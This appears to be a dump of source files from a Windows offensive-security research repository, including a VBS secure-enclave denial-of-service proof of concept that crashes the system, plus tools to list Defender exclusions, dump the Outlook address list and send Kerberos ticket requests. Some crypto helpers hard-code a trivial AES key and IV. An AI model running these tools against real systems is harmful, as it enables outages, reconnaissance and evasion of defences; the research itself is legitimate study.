40 | );
41 |
42 | #endif // !__DIA_CALLBACK_H_GUARD__
43 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ListAssemblies")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ListAssemblies")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3b49b239-4005-4f25-9e39-522c61b980be")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Secure Enclave/VBS/bsod.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file bsod.c
3 | * @date 20-05-2021
4 | * @author Paul L. (@am0nsec)
5 | * @version 1.0
6 | * @brief Microsoft Windows VBS Secure Enclave Denial of Service (DoS) Proof of Concept (PoC).
7 | * @link https://github.com/am0nsec/wspe
8 | */
9 | #include
10 | #include
11 |
12 | int main() {
13 | // 1. Check that the system supports VBS secure enclaves
14 | if (!IsEnclaveTypeSupported(ENCLAVE_TYPE_VBS)) {
15 | printf("[-] VBS secure enclave not supported.\n\n");
16 | return EXIT_FAILURE;
17 | }
18 | printf("[+] VBS secure enclave supported.\n");
19 |
20 | // 2. Create an Enclave.
21 | // 2097152 == 2Mb which is the minimum size working
22 | ENCLAVE_CREATE_INFO_VBS EnclaveCreateInfo = { 0x00 };
23 | LPVOID lpEnclaveAddress = CreateEnclave(
24 | (HANDLE)-1,
25 | NULL,
26 | 2097152,
27 | 0,
28 | ENCLAVE_TYPE_VBS,
29 | &EnclaveCreateInfo,
30 | sizeof(ENCLAVE_CREATE_INFO_VBS),
31 | NULL
32 | );
33 | if (lpEnclaveAddress == NULL) {
34 | printf("[-] Unable to create VBS secure enclave: %d\n", GetLastError());
35 | return EXIT_FAILURE;
36 | }
37 | printf("[+] VBS secure enclave created: 0x%p\n", lpEnclaveAddress);
38 |
39 | // 3. Initialise enclave to BSOD the system.
40 | ENCLAVE_INIT_INFO_VBS EnclaveInitInfo = { 0x00 };
41 | InitializeEnclave(
42 | (HANDLE)-1,
43 | lpEnclaveAddress,
44 | &EnclaveInitInfo,
45 | sizeof EnclaveInitInfo,
46 | NULL
47 | );
48 |
49 | // 4. Exit the process.
50 | printf("[+] System has not BSOD!\n\n");
51 | return EXIT_SUCCESS;
52 | }
53 |
--------------------------------------------------------------------------------
/Office/Outlook/src/main.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file main.c
3 | * @data 10/03/2021
4 | * @author Paul L. (@am0nsec)
5 | * @version 1.0
6 | * @brief Outlook utility class.
7 | * @details
8 | * @link https://github.com/am0nsec/wspe
9 | * @copyright This project has been released under the GNU Public License v3 license.
10 | */
11 |
12 | #include
13 | #include
14 |
15 | #include "outlook.h"
16 |
17 | int main() {
18 | // Initialise the class
19 | HANDLE hHeap = INVALID_HANDLE_VALUE;
20 | OutlookUtil* pOutlookUtil = NULL;
21 | if (OuCreateOutlookUtilClass(&pOutlookUtil, &hHeap) != S_OK)
22 | return EXIT_FAILURE;
23 |
24 | // Get the entries
25 | OutlookContactRecord* Records = NULL;
26 | LONG lRecordEntries = 0x00;
27 | EXIT_ON_ERROR(pOutlookUtil->lpVtbl.Initialise(pOutlookUtil));
28 | EXIT_ON_ERROR(pOutlookUtil->lpVtbl.GetGlobalAddressList(pOutlookUtil, &lRecordEntries, &Records));
29 |
30 | LONG cx = 0x00;
31 | OutlookContactRecord* src = Records;
32 |
33 | printf("[>] Number of contacts: %u\n", lRecordEntries);
34 | for (; cx < lRecordEntries; cx++) {
35 | OutlookContactRecord Record = { 0x00 };
36 | memcpy_s(&Record, sizeof(OutlookContactRecord), src++, sizeof(OutlookContactRecord));
37 |
38 | wprintf(L"%s %s - %s (%s)\n", Record.FirstName, Record.LastName, Record.PrimarySmtpAddress, Record.JobTitle);
39 | }
40 | HeapFree(GetProcessHeap(), 0x00, Records);
41 |
42 | // Cleanup
43 | EXIT_ON_ERROR(pOutlookUtil->lpVtbl.Uninitialise(pOutlookUtil));
44 | EXIT_ON_ERROR(OuFreeOutlookUtilClass(&pOutlookUtil, &hHeap));
45 | return EXIT_SUCCESS;
46 | }
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/AESCrypt.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 | Header Files
37 |
38 |
39 | Header Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Fusion/IAssemblyEnum.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace FindAssembly.Fusion {
5 |
6 | ///
7 | /// Represents an enumerator for an array of IAssemblyName objects.
8 | ///
9 | [ComImport, Guid("21B8916C-F28E-11D2-A473-00C04F8EF448")]
10 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
11 | public interface IAssemblyEnum {
12 |
13 | ///
14 | /// Gets a pointer to the next IAssemblyName contained in this IAssemblyEnum object.
15 | ///
16 | /// Reserved for future extensibility. pvReserved must be a null reference.
17 | /// The returned IAssemblyName pointer.
18 | /// Reserved for future extensibility. dwFlags must be 0 (zero).
19 | /// HRESULT
20 | [PreserveSig]
21 | uint GetNextAssembly(
22 | IntPtr pvReserved,
23 | out IAssemblyName ppName,
24 | uint dwFlags
25 | );
26 |
27 | ///
28 | /// Resets this IAssemblyEnum object to its starting position.
29 | ///
30 | /// HRESULT
31 | [PreserveSig]
32 | uint Reset();
33 |
34 | ///
35 | /// Creates a shallow copy of this IAssemblyEnum object.
36 | ///
37 | /// A pointer to the copy.
38 | /// HRESULT
39 | [PreserveSig]
40 | uint Clone(
41 | out IAssemblyEnum ppEnum
42 | );
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/AES.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
5 | namespace CNG {
6 | static const BYTE rgbIV[] = {
7 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
8 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F
9 | };
10 |
11 | static const BYTE rgbAES128Key[] = {
12 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
13 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F
14 | };
15 |
16 | class AES {
17 | public:
18 | BOOL WINAPI Initialise();
19 |
20 | protected:
21 | ~AES();
22 |
23 | BCRYPT_ALG_HANDLE hBcryptAlgHandle = NULL;
24 | BCRYPT_KEY_HANDLE hKeyHandle = NULL;
25 |
26 | BOOL bIsInitialised = FALSE;
27 | BOOL bAlreadyUsed = FALSE;
28 |
29 | DWORD cbKeyObject = 0;
30 | DWORD cbData = 0;
31 | DWORD cbBlockLen = 0;
32 | DWORD cbPlainText = 0;
33 | DWORD cbCipherText = 0;
34 |
35 | PBYTE pbKeyObject = NULL;
36 | PBYTE pbIV = NULL;
37 | PBYTE pbPlainText = NULL;
38 | PBYTE pbCipherText = NULL;
39 | };
40 |
41 | class AESEncrypt : public AES {
42 | public:
43 | ~AESEncrypt();
44 | BOOL WINAPI Encrypt();
45 | BOOL WINAPI SetStringToEncrypt(std::string sPlaintext);
46 | BOOL WINAPI SetBase64StringToEncrypt(std::string sPlaintext);
47 | std::string WINAPI GetEncryptedString();
48 | std::string WINAPI GetEncryptedBase64String();
49 | };
50 |
51 | class AESDecrypt : public AES {
52 | public:
53 | ~AESDecrypt();
54 | BOOL WINAPI Decrypt();
55 | BOOL WINAPI SetStringToDecrypt(std::string sCipherText);
56 | BOOL WINAPI SetBase64StringToDecrypt(std::string sCipherText);
57 | std::string WINAPI GetDecryptedString();
58 | std::string WINAPI GetDecryptedBase64String();
59 | };
60 | }
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/Base64.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | #pragma comment(lib, "libcrypto.lib")
11 |
12 | size_t GetDecodedLength(std::string EncodedString) {
13 | size_t len = EncodedString.size();
14 | size_t padding = 0;
15 |
16 | if (EncodedString[len - 1] == '=' && EncodedString[len - 2] == '=') {
17 | padding = 2;
18 | } else if (EncodedString[len - 1] == '=') {
19 | padding = 1;
20 | }
21 |
22 | len = ((len * 3) / 4) - padding;
23 | return len;
24 | }
25 |
26 | namespace Base64 {
27 | std::string Base64Encode(PUCHAR input, int Length) {
28 | BIO* bio = NULL;
29 | BIO* b64 = NULL;
30 | BUF_MEM* bPointer = NULL;
31 |
32 | b64 = BIO_new(BIO_f_base64());
33 | bio = BIO_new(BIO_s_mem());
34 | bio = BIO_push(b64, bio);
35 |
36 | BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL);
37 |
38 | BIO_write(b64, input, Length);
39 | BIO_flush(bio);
40 | BIO_get_mem_ptr(bio, &bPointer);
41 | BIO_set_close(bio, BIO_NOCLOSE);
42 | BIO_free_all(bio);
43 |
44 | std::string result(bPointer->length, '\0');
45 | RtlCopyMemory(&result[0], bPointer->data, bPointer->length);
46 | BUF_MEM_free(bPointer);
47 |
48 | return result;
49 | }
50 |
51 | std::vector Base64Decode(std::string input) {
52 | BIO* bio = NULL;
53 | BIO* b64 = NULL;
54 |
55 | bio = BIO_new_mem_buf(input.c_str(), -1);
56 | b64 = BIO_new(BIO_f_base64());
57 | bio = BIO_push(b64, bio);
58 |
59 | BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL);
60 |
61 | size_t DecodedLength = GetDecodedLength(input);
62 | std::vector OriginalEncryptedValues(DecodedLength, 0);
63 |
64 | BIO_read(bio, OriginalEncryptedValues.data(), static_cast(DecodedLength));
65 | BIO_free_all(bio);
66 |
67 | return OriginalEncryptedValues;
68 | }
69 | }
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/AESCrypt.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29215.179
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AESCrypt", "AESCrypt.vcxproj", "{3CB82A71-C96B-475D-B617-25924EB88631}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Custom|x64 = Custom|x64
11 | Custom|x86 = Custom|x86
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x64.ActiveCfg = Custom|x64
19 | {3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x64.Build.0 = Custom|x64
20 | {3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x86.ActiveCfg = Custom|Win32
21 | {3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x86.Build.0 = Custom|Win32
22 | {3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x64.ActiveCfg = Debug|x64
23 | {3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x64.Build.0 = Debug|x64
24 | {3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x86.ActiveCfg = Debug|Win32
25 | {3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x86.Build.0 = Debug|Win32
26 | {3CB82A71-C96B-475D-B617-25924EB88631}.Release|x64.ActiveCfg = Release|x64
27 | {3CB82A71-C96B-475D-B617-25924EB88631}.Release|x64.Build.0 = Release|x64
28 | {3CB82A71-C96B-475D-B617-25924EB88631}.Release|x86.ActiveCfg = Release|Win32
29 | {3CB82A71-C96B-475D-B617-25924EB88631}.Release|x86.Build.0 = Release|Win32
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {D52A9CB7-A857-4CD4-BEE2-1CCB19802991}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/Defender/ExclusionLists/main.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file main.c
3 | * @author Paul L. (@am0nsec)
4 | * @version 1.0
5 | * @brief List Windows Defender exclusions.
6 | * @details
7 | * @link https://github.com/am0nsec/wspe
8 | * @copyright This project has been released under the GNU Public License v3 license.
9 | */
10 |
11 | #include
12 | #include
13 |
14 | #include "defender.h"
15 |
16 | /**
17 | * @brief Application entry point.
18 | * @return Application exist status.
19 | */
20 | INT main() {
21 |
22 | // Get the complete list of exclusions
23 | DEFENDER_EXCLUSION_LIST ExclusionList = { 0x00 };
24 | HRESULT Result = DfdGetAllExclusions(&ExclusionList);
25 | if (Result != S_OK)
26 | return EXIT_FAILURE;
27 |
28 | // Display everything
29 | PDEFENDER_EXCLUSION_ENTRY ListEntry = ExclusionList.Extensions;
30 |
31 | printf("Type Value\n");
32 | printf("--------------- -----\n");
33 | for (DWORD cx = 0x00; cx < (sizeof(DEFENDER_EXCLUSION_LIST) / sizeof(PVOID)); cx++) {
34 |
35 | // Get the correct extension type
36 | PDEFENDER_EXCLUSION_ENTRY Entry = *(PUINT64)((PBYTE)&ExclusionList + (8 * cx));
37 |
38 | while (Entry != NULL) {
39 | switch (Entry->Type) {
40 | case DefenderExclusionExtensions:
41 | printf("%+-20s%s\n", "Extension", Entry->Exclusion);
42 | break;
43 | case DefenderExclusionIpAddress:
44 | printf("%+-20s%s\n", "IpAddress", Entry->Exclusion);
45 | break;
46 | case DefenderExclusionPaths:
47 | printf("%+-20s%s\n", "Paths", Entry->Exclusion);
48 | break;
49 | case DefenderExclusionProcesses:
50 | printf("%+-20s%s\n", "Processes", Entry->Exclusion);
51 | break;
52 | case DefenderExclusionTemporaryPaths:
53 | printf("%+-20s%s\n", "TemporaryPaths", Entry->Exclusion);
54 | break;
55 | }
56 | Entry = Entry->Flink;
57 | }
58 | }
59 |
60 | // Cleanup and exit
61 | DfdpCleanup(&ExclusionList);
62 | return EXIT_SUCCESS;
63 | }
--------------------------------------------------------------------------------
/Object Manager/List Handles/ntstructs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | /*--------------------------------------------------------------------
5 | Macros.
6 | --------------------------------------------------------------------*/
7 | #ifndef NT_SUCCESS
8 | #define NT_SUCCESS(StatCode) ((NTSTATUS)(StatCode) >= 0)
9 | #endif
10 |
11 | #define STATUS_SUCCESS 0x00000000
12 | #define STATUS_UNSUCCESSFUL 0xC0000001
13 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
14 |
15 | /*--------------------------------------------------------------------
16 | Windows structures.
17 | --------------------------------------------------------------------*/
18 | typedef struct _UNICODE_STRING {
19 | USHORT Length;
20 | USHORT MaximumLength;
21 | PWSTR Buffer;
22 | } UNICODE_STRING, * PUNICODE_STRING;
23 |
24 | typedef struct _OBJECT_NAME_INFORMATION {
25 | UNICODE_STRING Name;
26 | } OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
27 |
28 | typedef struct _PUBLIC_OBJECT_BASIC_INFORMATION {
29 | ULONG Attributes;
30 | ACCESS_MASK GrantedAccess;
31 | ULONG HandleCount;
32 | ULONG PointerCount;
33 | ULONG Reserved[10];
34 | } PUBLIC_OBJECT_BASIC_INFORMATION, * PPUBLIC_OBJECT_BASIC_INFORMATION;
35 |
36 | typedef struct _PUBLIC_OBJECT_TYPE_INFORMATION {
37 | UNICODE_STRING TypeName;
38 | ULONG Reserved[22];
39 | } PUBLIC_OBJECT_TYPE_INFORMATION, * PPUBLIC_OBJECT_TYPE_INFORMATION;
40 |
41 | typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
42 | HANDLE HandleValue;
43 | ULONG_PTR HandleCount;
44 | ULONG_PTR PointerCount;
45 | ULONG GrantedAccess;
46 | ULONG ObjectTypeIndex;
47 | ULONG HandleAttributes;
48 | ULONG Reserved;
49 | } PROCESS_HANDLE_TABLE_ENTRY_INFO, * PPROCESS_HANDLE_TABLE_ENTRY_INFO;
50 |
51 | typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
52 | ULONG_PTR NumberOfHandles;
53 | ULONG_PTR Reserved;
54 | PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
55 | } PROCESS_HANDLE_SNAPSHOT_INFORMATION, * PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
56 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Fusion/IAssemblyCacheItem.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Runtime.InteropServices;
4 | using System.Runtime.InteropServices.ComTypes;
5 |
6 | namespace FindAssembly.Fusion {
7 |
8 | [ComImport, Guid("9E3AAEB4-D1CD-11D2-BAB9-00C04F8ECEAE")]
9 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
10 | public interface IAssemblyCacheItem {
11 |
12 | ///
13 | /// Allows the assembly in the global assembly cache to perform cleanup operations before it is released.
14 | ///
15 | /// HRESULT
16 | [PreserveSig]
17 | uint AbortItem();
18 |
19 | ///
20 | /// Commits the cached assembly reference to memory.
21 | ///
22 | /// Flags defined in Fusion.idl.
23 | /// A value that indicates the result of the operation.
24 | /// HRESULT
25 | [PreserveSig]
26 | uint Commit(
27 | uint dwFlags,
28 | ref ulong pulDisposition
29 | );
30 |
31 | ///
32 | /// Creates a stream with the specified name and format.
33 | ///
34 | /// Flags defined in Fusion.idl.
35 | /// The name of the stream to be created.
36 | /// The format of the file to be streamed.
37 | /// Format-specific flags defined in Fusion.idl.
38 | /// A pointer to the address of the returned IStream instance.
39 | /// The maximum size of the stream referenced by ppIStream.
40 | /// HRESULT
41 | [PreserveSig]
42 | uint CreateStream(
43 | uint dwFlags,
44 | [MarshalAs(UnmanagedType.LPWStr)] StringBuilder pszAssemblyName,
45 | uint dwFormat,
46 | uint dwFormatFlags,
47 | out IStream ppIStream,
48 | ref long puliMaxSize
49 | );
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using FindAssembly.Fusion;
4 |
5 | namespace FindAssembly {
6 | internal sealed class Program {
7 | static void Main(string[] args) {
8 | Console.WriteLine("\nFind and load .NET Framework Assembly from the GAC");
9 | Console.WriteLine("Copyright (C) 2020 Paul Laine (@am0nsec)");
10 | Console.WriteLine("https://ntamonsec.blogpost.com\n");
11 |
12 | if (args.Length != 2) {
13 | Console.WriteLine("usage: FindAssembly.exe <1> <2>");
14 | Console.WriteLine("\t 1- The name of the .NET Framework Assembly to find.");
15 | Console.WriteLine("\t 2- The major version of the .NET Framework Assembly.\n");
16 |
17 | Console.WriteLine("example: \n");
18 | Console.WriteLine("\t FindAssembly.exe System.Management.Automation 3\n");
19 | return;
20 | }
21 | string szAssemblyName = args[0];
22 | Int16 i16Version = Convert.ToInt16(args[1]);
23 |
24 | // Find the System.Management.Automation Assembly
25 | GACUtil gac = new GACUtil();
26 | ASSEMBLY_IDENTITY AssemblyIdentity = new ASSEMBLY_IDENTITY();
27 | gac.FindAssembly(szAssemblyName, i16Version, ref AssemblyIdentity);
28 | Console.WriteLine($"Assembly path: \n{AssemblyIdentity.szGacPath}\n");
29 |
30 | // Load the assembly into new application domain
31 | AppDomain domain = AppDomain.CreateDomain("C367F796-8B63-461D-A058-2CCD657F1891");
32 | Assembly assembly = domain.Load(AssemblyName.GetAssemblyName(AssemblyIdentity.szGacPath));
33 |
34 | // List all types
35 | if (assembly != null) {
36 | Console.WriteLine("Exported Types:");
37 | foreach (Type t in assembly.GetExportedTypes())
38 | Console.WriteLine($"\t {t.Name}");
39 |
40 | AppDomain.Unload(domain);
41 | } else {
42 | Console.WriteLine("Assembly not loaded!");
43 | }
44 | #if DEBUG
45 | Console.ReadKey();
46 | #endif
47 | }
48 | }
49 | }
50 |
--------------------------------------------------------------------------------
/Object Manager/List Objects/ntstructs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | /*--------------------------------------------------------------------
5 | Macros.
6 | --------------------------------------------------------------------*/
7 | #ifndef NT_SUCCESS
8 | #define NT_SUCCESS(StatCode) ((NTSTATUS)(StatCode) >= 0)
9 | #endif
10 | #ifndef DEVICE_NOTIFY_CALLBACK
11 | #define DEVICE_NOTIFY_CALLBACK 2
12 | #endif
13 |
14 | #define OBJ_CASE_INSENSITIVE 0x00000040L
15 |
16 | #define STATUS_SUCCESS 0x00000000
17 | #define STATUS_NO_MORE_ENTRIES 0x8000001AL
18 | #define STATUS_UNSUCCESSFUL 0xC0000001
19 | #define STATUS_BUFFER_TOO_SMALL 0xC0000023
20 |
21 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
22 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
23 | (p)->RootDirectory = r; \
24 | (p)->Attributes = a; \
25 | (p)->ObjectName = n; \
26 | (p)->SecurityDescriptor = s; \
27 | (p)->SecurityQualityOfService = NULL; \
28 | }
29 |
30 | /*--------------------------------------------------------------------
31 | Windows structures.
32 | --------------------------------------------------------------------*/
33 | typedef struct _LSA_UNICODE_STRING {
34 | USHORT Length;
35 | USHORT MaximumLength;
36 | PWSTR Buffer;
37 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
38 |
39 | typedef struct _OBJECT_ATTRIBUTES {
40 | ULONG Length;
41 | PVOID RootDirectory;
42 | PUNICODE_STRING ObjectName;
43 | ULONG Attributes;
44 | PVOID SecurityDescriptor;
45 | PVOID SecurityQualityOfService;
46 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
47 |
48 | typedef struct _OBJECT_DIRECTORY_INFORMATION {
49 | UNICODE_STRING Name;
50 | UNICODE_STRING TypeName;
51 | } OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
52 |
53 | enum DirectoryAccess {
54 | DIRECTORY_QUERY = 0x0001,
55 | DIRECTORY_TRAVERSE = 0x0002,
56 | DIRECTORY_CREATE_OBJECT = 0x0004,
57 | DIRECTORY_CREATE_SUBDIRECTORY = 0x0008,
58 | DIRECTORY_ALL_ACCESS = STANDARD_RIGHTS_ALL | 0xF
59 | };
60 |
61 |
--------------------------------------------------------------------------------
/Kerberos/AskTGT/socket.c:
--------------------------------------------------------------------------------
1 |
2 | #include "socket.h"
3 |
4 | ///
5 | /// Initialise WinSOCK 2
6 | ///
7 | NTSTATUS SockpInitialise() {
8 | WSADATA WSAData = { 0x00 };
9 | INT Result = WSAStartup(MAKEWORD(2, 2), &WSAData);
10 | return (Result != 0x00) ? STATUS_UNSUCCESSFUL : STATUS_SUCCESS;
11 | }
12 |
13 | ///
14 | /// Uninitialise WinSOCK 2
15 | ///
16 | NTSTATUS SockpUninitialise() {
17 | INT Result = WSACleanup();
18 | return (Result != 0x00) ? STATUS_UNSUCCESSFUL : STATUS_SUCCESS;
19 | }
20 |
21 | ///
22 | /// Send kerberos AS-REQ to domain controller.
23 | ///
24 | NTSTATUS SockSendKerberosASRequest(
25 | _In_ LPSTR Address,
26 | _In_ PBYTE Request,
27 | _In_ INT32 RequestSize,
28 | _Out_ PBYTE* Response,
29 | _Out_ INT32* ResponseSize
30 | ) {
31 | // Initialise WinSOCK 2
32 | SockpInitialise();
33 |
34 | // Forge the required structures
35 | PADDRINFOA AddressInfo = NULL;
36 | INT Result = getaddrinfo(
37 | Address,
38 | "88",
39 | NULL,
40 | &AddressInfo
41 | );
42 | if (Result != 0x00 || AddressInfo == NULL) {
43 | SockpUninitialise();
44 | return STATUS_UNSUCCESSFUL;
45 | }
46 |
47 | // Create socket
48 | SOCKET Socket = INVALID_SOCKET;
49 | Socket = socket(AddressInfo->ai_family, AddressInfo->ai_socktype, AddressInfo->ai_protocol);
50 | if (Socket == INVALID_SOCKET) {
51 | SockpUninitialise();
52 | return STATUS_UNSUCCESSFUL;
53 | }
54 |
55 | // Connect to remote system
56 | Result = connect(Socket, AddressInfo->ai_addr, AddressInfo->ai_addrlen);
57 | if (Result == SOCKET_ERROR) {
58 | closesocket(Socket);
59 | SockpUninitialise();
60 | return STATUS_UNSUCCESSFUL;
61 | }
62 |
63 | // Send the size of the request first
64 | UCHAR Packet[0x04] = { 0x00 };
65 | Packet[0x00] = XLATE_UINT32(RequestSize, 0x00);
66 | Packet[0x01] = XLATE_UINT32(RequestSize, 0x01);
67 | Packet[0x02] = XLATE_UINT32(RequestSize, 0x02);
68 | Packet[0x03] = XLATE_UINT32(RequestSize, 0x03);
69 | Result = send(Socket, Packet, 0x04, 0x00);
70 |
71 | // Send the data now
72 | Result = send(Socket, Request, RequestSize, 0x00);
73 | if (Result == SOCKET_ERROR) {
74 | closesocket(Socket);
75 | SockpUninitialise();
76 | return STATUS_UNSUCCESSFUL;
77 | }
78 |
79 | // Cleanup and exit
80 | closesocket(Socket);
81 | return SockpUninitialise();
82 | }
--------------------------------------------------------------------------------
/Defender/ExclusionLists/inc/defender.h:
--------------------------------------------------------------------------------
1 | /**
2 | * @file defender.h
3 | * @author Paul L. (@am0nsec)
4 | * @version 1.0
5 | * @brief Windows Defender Exclusion List header.
6 | * @details
7 | * @link https://github.com/am0nsec/wspe
8 | * @copyright This project has been released under the GNU Public License v3 license.
9 | */
10 |
11 | #ifndef __DEFENDER_EXCLUSIONLISTS_H_GUARD__
12 | #define __DEFENDER_EXCLUSIONLISTS_H_GUARD__
13 |
14 | #include
15 |
16 | /**
17 | * @brief Windows Defender type of exclusion entry.
18 | */
19 | typedef enum _DEFENDER_EXCLUSION_TYPE {
20 | DefenderExclusionExtensions = 0x00,
21 | DefenderExclusionIpAddress = 0x01,
22 | DefenderExclusionPaths = 0x02,
23 | DefenderExclusionProcesses = 0x03,
24 | DefenderExclusionTemporaryPaths = 0x04
25 | } DEFENDER_EXCLUSION_TYPE;
26 |
27 | /**
28 | * @brief Double-linked list for Windows Defender exclusion entry.
29 | */
30 | typedef struct _DEFENDER_EXCLUSION_ENTRY {
31 | LPVOID Blink;
32 | LPVOID Flink;
33 | DEFENDER_EXCLUSION_TYPE Type;
34 | DWORD Length;
35 | LPCSTR Exclusion;
36 | } DEFENDER_EXCLUSION_ENTRY, *PDEFENDER_EXCLUSION_ENTRY;
37 |
38 | /**
39 | * @brief List of Windows Defender exclusions.
40 | */
41 | typedef struct _DEFENDER_EXCLUSION_LIST {
42 | PDEFENDER_EXCLUSION_ENTRY Extensions;
43 | PDEFENDER_EXCLUSION_ENTRY IpAddresses;
44 | PDEFENDER_EXCLUSION_ENTRY Paths;
45 | PDEFENDER_EXCLUSION_ENTRY Processes;
46 | PDEFENDER_EXCLUSION_ENTRY TemporaryPaths;
47 | } DEFENDER_EXCLUSION_LIST, * PDEFENDER_EXCLUSION_LIST;
48 |
49 | _Success_(return == S_OK) _Must_inspect_result_
50 | HRESULT STDMETHODCALLTYPE DfdGetAllExclusions(
51 | _Out_ PDEFENDER_EXCLUSION_LIST pExclusionsList
52 | );
53 |
54 | _Success_(return == S_OK) _Must_inspect_result_
55 | HRESULT STDMETHODCALLTYPE DfdpGetExclusionEntries(
56 | _In_ PDEFENDER_EXCLUSION_ENTRY pExclusionEntry,
57 | _In_ LPCSTR szSubKeyName,
58 | _In_ CONST DEFENDER_EXCLUSION_TYPE Type,
59 | _In_ CONST PHKEY pParentKey,
60 | _In_ CONST PHANDLE phHeap,
61 | _Out_ PDWORD pdwNumberOfValues
62 | );
63 |
64 | _Success_(return == S_OK)
65 | HRESULT STDMETHODCALLTYPE DfdpCleanup(
66 | _In_ PDEFENDER_EXCLUSION_LIST pExclusionsList
67 | );
68 |
69 | #endif // !__DEFENDER_EXCLUSIONLISTS_H_GUARD__
